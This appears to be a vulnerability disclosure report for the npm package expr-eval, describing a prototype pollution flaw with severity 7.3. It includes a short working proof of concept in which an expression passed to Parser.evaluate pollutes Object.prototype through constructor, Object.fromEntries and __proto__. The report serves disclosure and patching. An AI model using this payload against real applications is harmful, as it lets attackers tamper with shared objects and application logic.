expr-eval

vulnerability prototype pollution

severity 7.3

language javascript

registry npm

repo silentmatt/expr-eval

fork 418sec/expr-eval

✍️ Description

With speficific input attckers can define properties on prototype, which will lead to prototype pollution.

Need node version>=12.0.0, which introduce Object.fromEntries

🕵️‍♂️ Proof of Concept

// PoC.js
const { Parser } = require('expr-eval');
const o = {};
console.log("o.a=", o.a); // o.a= undefined
const res = Parser.evaluate('Object=constructor;a=Object.fromEntries([["a","polluted"]]);Object.assign(__proto__, a)');
console.log("o.a=", o.a); // o.a= polluted

💥 Impact

This vulnerability is capable of make a prototype pollution

References

Permalink #1